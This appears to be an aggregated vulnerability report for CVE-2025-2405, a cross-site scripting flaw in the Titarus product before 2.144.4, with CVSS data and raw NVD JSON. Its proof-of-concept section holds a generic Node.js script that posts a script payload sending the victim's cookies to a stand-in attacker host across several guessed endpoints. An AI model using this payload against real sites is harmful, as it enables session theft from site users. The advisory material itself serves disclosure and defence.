Security Vulnerability Report
CVE-2025-2405 (CVSS 7.6, HIGH)

Published: 2025-12-25 14:15:53
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Titarus allows Cross-Site Scripting (XSS). This issue affects Titarus: before 2.144.4.

CVSS Details

CVSS Score: 7.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available beyond the version range stated in the description:

Titarus < 2.144.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-2405 PoC - XSS in Titarus
// Target: Titarus < 2.144.4
// Node.js script (not Python, as the original label suggested); requires the axios package.
const axios = require('axios');

// Replace with actual target URL
const targetUrl = 'https://vulnerable-titarus-site.com';

// XSS Payload
const xssPayload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>';

async function exploit() {
  try {
    // Try to inject XSS in common input fields
    // This is a generic PoC - specific injection point needs to be identified
    const injectionPoints = [
      '/api/submit',
      '/user/profile',
      '/message/send',
      '/comment/add'
    ];

    for (const endpoint of injectionPoints) {
      try {
        // axios.post(url, body, config): headers and timeout belong in the
        // third argument; the original passed them inside the request body,
        // so they were never applied.
        const response = await axios.post(
          targetUrl + endpoint,
          { data: xssPayload },
          {
            headers: { 'Content-Type': 'application/json' },
            timeout: 5000
          }
        );
        // A 2xx status only means the request was accepted; it does not show
        // that the value is later rendered into a page without encoding.
        console.log(`Injected at ${endpoint}: Status ${response.status}`);
      } catch (error) {
        console.log(`Failed at ${endpoint}: ${error.message}`);
      }
    }
  } catch (error) {
    console.error('Exploit failed:', error.message);
  }
}

exploit();
```

References

https://www.usom.gov.tr/bildirim/tr-25-0485
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-2405",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-25T14:15:52.707",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Titarus allows Cross-Site Scripting (XSS).This issue affects Titarus: before 2.144.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0485",
        "source": "[email protected]"
      }
    ]
  }
}
```